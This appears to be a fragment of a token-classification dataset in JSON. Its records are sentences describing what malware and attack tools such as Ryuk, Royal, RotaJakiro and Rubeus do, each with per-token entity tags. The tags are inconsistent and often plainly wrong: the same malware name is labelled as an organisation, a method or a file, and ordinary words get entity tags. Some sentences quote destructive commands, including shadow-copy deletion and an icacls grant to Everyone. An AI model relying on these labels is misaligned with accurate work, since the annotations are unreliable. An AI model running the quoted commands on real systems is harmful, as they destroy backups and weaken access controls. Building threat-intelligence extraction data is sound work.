"O" ] }, { "tokens": [ "RogueRobin", "has", "a", "command", "named", "<code>$screenshot</code>", "that", "may", "be", "responsible", "for", "taking", "screenshots", "of", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "enumerates", "running", "processes", "to", "search", "for", "Wireshark", "and", "Windows", "Sysinternals", "suite." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "establishes", "persistence", "by", "creating", "a", "shortcut", "(.LNK", "file)", "in", "the", "Windows", "startup", "folder", "to", "run", "a", "script", "each", "time", "the", "user", "logs", "in." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "base64", "encodes", "strings", "that", "are", "sent", "to", "the", "C2", "over", "its", "DNS", "tunnel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "RogueRobin", "uses", "WMI", "to", "check", "BIOS", "version", "for", "VBOX,", "bochs,", "qemu,", "virtualbox,", "and", "vm", "to", "check", "for", "evidence", "that", "the", "script", "might", "be", "executing", "within", "an", "analysis", "environment." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "gathers", "BIOS", "versions", "and", "manufacturers,", "the", "number", "of", "CPU", "cores,", "the", "total", "physical", "memory,", "and", "the", "computer", "name." ], "ner_tags": [ "B-Idus", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "gathers", "the", "IP", "address", "and", "domain", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "collects", "the", "victim’s", "username", "and", "whether", "that", "user", "is", "an", "admin." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "uses", "Windows", "Script", "Components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "RogueRobin", "uses", "various", "WMI", "queries", "to", "check", "if", "the", "sample", "is", "running", "in", "a", "sandbox." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Depending", "on", "the", "Linux", "distribution,", "RotaJakiro", "executes", "a", "set", "of", "commands", "to", "collect", "device", "information", "and", "sends", "the", "collected", "information", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Depending", "on", "the", "Linux", "distribution", "and", "when", "executing", "with", "root", "permissions,", "RotaJakiro", "may", "install", "persistence", "using", "a", "`.conf`", "file", "in", "the", "`/etc/init/`", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "RotaJakiro", "uses", "the", "AES", "algorithm,", "bit", "shifts", "in", "a", "function", "called", "`rotate`,", "and", "an", "XOR", "cipher", "to", "decrypt", "resources", "required", "for", "persistence,", "process", "guarding,", "and", "file", "locking.", "It", "also", "performs", "this", "same", "function", "on", "encrypted", "stack", "strings", "and", "the", "`head`", "and", "`key`", "sections", "in", "the", "network", "packet", "structure", "used", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "sends", "device", "and", "other", "collected", "data", "back", "to", "the", "C2", "using", "the", "established", "C2", "channels", "over", "TCP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "When", "executing", "with", "non-root", "permissions,", "RotaJakiro", "uses", "the", "the", "`shmget", "API`", "to", "create", "shared", "memory", "between", "other", "known", "RotaJakiro", "processes.", "This", "allows", "processes", "to", "communicate", "with", "each", "other", "and", "share", "their", "PID." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Purp", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "has", "used", "the", "filename", "`systemd-daemon`", "in", "an", "attempt", "to", "appear", "legitimate." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "executing", "with", "non-root", "permissions,", "RotaJakiro", "uses", "the", "the", "`shmget`", "API", "to", "create", "shared", "memory", "between", "other", "known", "RotaJakiro", "processes.", "RotaJakiro", "also", "uses", "the", "`execvp`", "API", "to", "help", "its", "dead", "process", "\"resurrect\"." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Purp", "B-Features", "B-Purp", "O", "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "uses", "a", "custom", "binary", "protocol", "using", "a", "type,", "length,", "value", "format", "over", "TCP." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "uses", "a", "custom", "binary", "protocol", "over", "TCP", "port", "443." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "can", "monitor", "the", "`/proc/[PID]`", "directory", "of", "known", "RotaJakiro", "processes", "as", "a", "part", "of", "its", "persistence", "when", "executing", "with", "non-root", "permissions.", "If", "the", "process", "is", "found", "dead,", "it", "resurrects", "the", "process.", "RotaJakiro", "processes", "can", "be", "matched", "to", "an", "associated", "Advisory", "Lock,", "in", "the", "`/proc/locks`", "folder,", "to", "ensure", "it", "doesn't", "spawn", "more", "than", "one", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "uses", "dynamically", "linked", "shared", "libraries", "(`.so`", "files)", "to", "execute", "additional", "functionality", "using", "`dlopen()`", "and", "`dlsym()`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "uses", "ZLIB", "Compression", "to", "compresses", "data", "sent", "to", "the", "C2", "server", "in", "the", "`payload`", "section", "network", "communication", "packet." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RotaJakiro", "encrypts", "C2", "communication", "using", "a", "combination", "of", "AES,", "XOR,", "ROTATE", "encryption,", "and", "ZLIB", "compression." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Tool", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "RotaJakiro", "executes", "a", "set", "of", "commands", "to", "collect", "device", "information,", "including", "`uname`.", "Another", "example", "is", "the", "`cat", "/etc/*release", "|", "uniq`", "command", "used", "to", "collect", "the", "current", "OS", "distribution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Depending", "on", "the", "Linux", "distribution", "and", "when", "executing", "with", "root", "permissions,", "RotaJakiro", "may", "install", "persistence", "using", "a", "`.service`", "file", "under", "the", "`/lib/systemd/system/`", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "executing", "with", "non-root", "level", "permissions,", "RotaJakiro", "can", "install", "persistence", "by", "adding", "a", "command", "to", "the", ".bashrc", "file", "that", "executes", "a", "binary", "in", "the", "`${HOME}/.gvfsd/.profile/`", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "When", "executing", "with", "user-level", "permissions,", "RotaJakiro", "can", "install", "persistence", "using", "a", ".desktop", "file", "under", "the", "`$HOME/.config/autostart/`", "folder." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Rover", "automatically", "collects", "files", "from", "the", "local", "system", "and", "removable", "drives", "based", "on", "a", "predefined", "list", "of", "file", "extensions", "on", "a", "regular", "timeframe." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "automatically", "searches", "for", "files", "on", "local", "drives", "based", "on", "a", "predefined", "list", "of", "file", "extensions", "and", "sends", "them", "to", "the", "command", "and", "control", "server", "every", "60", "minutes.", "Rover", "also", "automatically", "sends", "keylogger", "files", "and", "screenshots", "to", "the", "C2", "server", "on", "a", "regular", "timeframe." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "searches", "for", "files", "on", "local", "drives", "based", "on", "a", "predefined", "list", "of", "file", "extensions." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "searches", "for", "files", "on", "attached", "removable", "drives", "based", "on", "a", "predefined", "list", "of", "file", "extensions", "every", "five", "seconds." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "automatically", "searches", "for", "files", "on", "local", "drives", "based", "on", "a", "predefined", "list", "of", "file", "extensions." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "has", "keylogging", "functionality." ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Rover", "copies", "files", "from", "removable", "drives", "to", "<code>C:\\system</code>." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "has", "functionality", "to", "remove", "Registry", "Run", "key", "persistence", "as", "a", "cleanup", "procedure." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rover", "persists", "by", "creating", "a", "Registry", "entry", "in", "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Rover", "takes", "screenshots", "of", "the", "compromised", "system's", "desktop", "and", "saves", "them", "to", "<code>C:\\system\\screenshot.bmp</code>", "for", "exfiltration", "every", "60", "minutes." ], "ner_tags": [ "B-HackOrg", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "uses", "a", "multi-threaded", "encryption", "process", "that", "can", "partially", "encrypt", "targeted", "files", "with", "the", "OpenSSL", "library", "and", "the", "AES256", "algorithm." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Royal", "can", "identify", "specific", "files", "and", "directories", "to", "exclude", "from", "the", "encryption", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "delete", "shadow", "copy", "backups", "with", "vssadmin.exe", "using", "the", "command", "`delete", "shadows", "/all", "/quiet`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "use", "multiple", "APIs", "for", "discovery,", "communication,", "and", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Royal", "can", "scan", "the", "network", "interfaces", "of", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "enumerate", "the", "shared", "resources", "of", "a", "given", "IP", "addresses", "using", "the", "API", "call", "`NetShareEnum`." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "establishes", "a", "TCP", "socket", "for", "C2", "communication", "using", "the", "API", "`WSASocketW`." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Royal", "has", "been", "spread", "through", "the", "use", "of", "phishing", "campaigns", "including", "\"call", "back", "phishing\"", "where", "victims", "are", "lured", "into", "calling", "a", "number", "provided", "through", "email." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "I-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Royal", "can", "use", "`GetCurrentProcess`", "to", "enumerate", "processes." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "use", "SMB", "to", "connect", "to", "move", "laterally." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "use", "`RmShutDown`", "to", "kill", "applications", "and", "services", "using", "the", "resources", "that", "are", "targeted", "for", "encryption." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "use", "`GetNativeSystemInfo`", "and", "`GetLogicalDrives`", "to", "enumerate", "system", "processors", "and", "logical", "drives." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Royal", "can", "enumerate", "IP", "addresses", "using", "`GetIpAddrTable`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Rubeus", "can", "reveal", "the", "credentials", "of", "accounts", "that", "have", "Kerberos", "pre-authentication", "disabled", "through", "AS-REP", "roasting." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rubeus", "can", "gather", "information", "about", "domain", "trusts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Rubeus", "can", "forge", "a", "ticket-granting", "ticket." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Rubeus", "can", "use", "the", "`KerberosRequestorSecurityToken.GetRequest`", "method", "to", "request", "kerberoastable", "service", "tickets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rubeus", "can", "create", "silver", "tickets." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Ruler", "can", "be", "used", "to", "enumerate", "Exchange", "users", "and", "dump", "the", "GAL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "B-Org", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ruler", "can", "be", "used", "to", "automate", "the", "abuse", "of", "Outlook", "Forms", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ruler", "can", "be", "used", "to", "automate", "the", "abuse", "of", "Outlook", "Home", "Pages", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ruler", "can", "be", "used", "to", "automate", "the", "abuse", "of", "Outlook", "Rules", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "contains", "code", "to", "compress", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "contains", "code", "to", "clear", "event", "logs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "RunningRAT", "contains", "code", "to", "open", "and", "copy", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "kills", "antimalware", "running", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "contains", "code", "to", "delete", "files", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "captures", "keystrokes", "and", "sends", "them", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "adds", "itself", "to", "the", "Registry", "key", "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "to", "establish", "persistence", "upon", "reboot." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RunningRAT", "gathers", "the", "OS", "version,", "logical", "drives", "information,", "processor", "information,", "and", "volume", "information." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "B-Features", "O" ] }, { "tokens": [ "RunningRAT", "uses", "a", "batch", "file", "to", "kill", "a", "security", "program", "task", "and", "then", "attempts", "to", "remove", "itself." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "attempted", "to", "adjust", "its", "token", "privileges", "to", "have", "the", "<code>SeDebugPrivilege</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "a", "combination", "of", "symmetric", "(AES)", "and", "asymmetric", "(RSA)", "encryption", "to", "encrypt", "files.", "Files", "have", "been", "encrypted", "with", "their", "own", "AES", "key", "and", "given", "a", "file", "extension", "of", ".RYK.", "Encrypted", "directories", "have", "had", "a", "ransom", "note", "of", "RyukReadMe.txt", "written", "to", "the", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "stopped", "services", "related", "to", "anti-virus." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "can", "use", "stolen", "domain", "admin", "accounts", "to", "move", "laterally", "within", "a", "victim", "domain." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "enumerated", "files", "and", "folders", "on", "all", "mounted", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "<code>vssadmin", "Delete", "Shadows", "/all", "/quiet</code>", "to", "to", "delete", "volume", "shadow", "copies", "and", "<code>vssadmin", "resize", "shadowstorage</code>", "to", "force", "deletion", "of", "shadow", "copies", "created", "by", "third-party", "applications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "can", "create", ".dll", "files", "that", "actually", "contain", "a", "Rich", "Text", "File", "format", "document." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "constructed", "legitimate", "appearing", "installation", "folder", "paths", "by", "calling", "<code>GetWindowsDirectoryW</code>", "and", "then", "inserting", "a", "null", "byte", "at", "the", "fourth", "character", "of", "the", "path.", "For", "Windows", "Vista", "or", "higher,", "the", "path", "would", "appear", "as", "<code>C:\\Users\\Public</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "multiple", "native", "APIs", "including", "<code>ShellExecuteW</code>", "to", "run", "executables,<code>GetWindowsDirectoryW</code>", "to", "create", "folders,", "and", "<code>VirtualAlloc</code>,", "<code>WriteProcessMemory</code>,", "and", "<code>CreateRemoteThread</code>", "for", "process", "injection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-HackOrg", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "can", "use", "anti-disassembly", "and", "code", "transformation", "obfuscation", "techniques." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "called", "<code>CreateToolhelp32Snapshot</code>", "to", "enumerate", "all", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "injected", "itself", "into", "remote", "processes", "to", "encrypt", "files", "using", "a", "combination", "of", "<code>VirtualAlloc</code>,", "<code>WriteProcessMemory</code>,", "and", "<code>CreateRemoteThread</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "the", "Windows", "command", "line", "to", "create", "a", "Registry", "entry", "under", "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "the", "C$", "network", "share", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "can", "remotely", "create", "a", "scheduled", "task", "to", "execute", "itself", "on", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "called", "<code>kill.bat</code>", "for", "stopping", "services,", "disabling", "services", "and", "killing", "processes." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "I-Idus", "O", "B-Idus", "I-Idus", "O", "O", "B-Idus" ] }, { "tokens": [ "Ryuk", "has", "called", "<code>GetLogicalDrives</code>", "to", "emumerate", "all", "mounted", "drives,", "and", "<code>GetDriveTypeW</code>", "to", "determine", "the", "drive", "type." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "been", "observed", "to", "query", "the", "registry", "key", "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language</code>", "and", "the", "value", "<code>InstallLanguage</code>.", "If", "the", "machine", "has", "the", "value", "0x419", "(Russian),", "0x422", "(Ukrainian),", "or", "0x423", "(Belarusian),", "it", "stops", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "called", "<code>GetIpNetTable</code>", "in", "attempt", "to", "identify", "all", "mounted", "drives", "and", "hosts", "that", "have", "Address", "Resolution", "Protocol", "(ARP)", "entries." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "Wake-on-Lan", "to", "power", "on", "turned", "off", "systems", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "has", "used", "<code>cmd.exe</code>", "to", "create", "a", "Registry", "entry", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ryuk", "can", "launch", "<code>icacls", "<path>", "/grant", "Everyone:F", "/T", "/C", "/Q</code>", "to", "delete", "every", "access-based", "restrictions", "on", "files", "and", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "deleted", "accounts", "it", "has", "created." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "uploaded", "data", "and", "files", "from", "a", "compromised", "host", "to", "its", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "primarily", "uses", "port", "80", "for", "C2,", "but", "falls", "back", "to", "ports", "443", "or", "8080", "if", "initial", "communication", "fails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "deleted", "files", "it", "has", "created", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "can", "download", "additional", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "run", "the", "command", "`net", "user`", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "may", "create", "a", "temporary", "user", "on", "the", "system", "named", "`Lost_{Unique", "Identifier}`", "with", "the", "password", "`pond~!@6”{Unique", "Identifier}`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", 